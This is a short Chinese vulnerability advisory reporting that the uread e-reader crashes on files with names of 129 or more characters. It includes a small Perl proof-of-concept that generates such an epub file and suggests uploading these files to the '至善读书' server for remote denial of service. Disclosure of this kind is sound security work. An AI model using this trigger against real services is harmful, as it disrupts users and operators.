uread阅读器在远程或本地打开文件名过长(大于或等于129个字符)的upub等文件时将引起uread.exe程序无法正常工作,必须重新启动uread.exe进程方可。
远程攻击者可考虑将过长文件名的文件上传至“至善读书”的服务器端,实现远程拒绝服务攻击。
测试证明
-----------------------------------------------------------
#!/usr/bin/perl -w
$filename="a"x129;
print "------generate testfile \"a\"x129.epub------\n";
open(testfile, ">$filename.epub");
sleep(3);
close(testfile);
print "------complete!------\n";
exit(1);
-----------------------------------------------------------
修复方案:
目前厂商还没有提供补丁或者升级程序。
作者 demonalex
如对本文有疑问,
点击进行留言回复!!
相关文章:
-
-
-
-
-
-
-
-
-
-
关于XSS漏洞另一个攻击趋势
XSS漏洞一般是基于WEB程序的输入输出问题,但最近80SEC开始发现了一系列以IE为内核的第三方浏览器的漏洞,在评估其中的XSS漏洞,我们发现了基于浏览器软件...
[阅读全文]
-
网友评论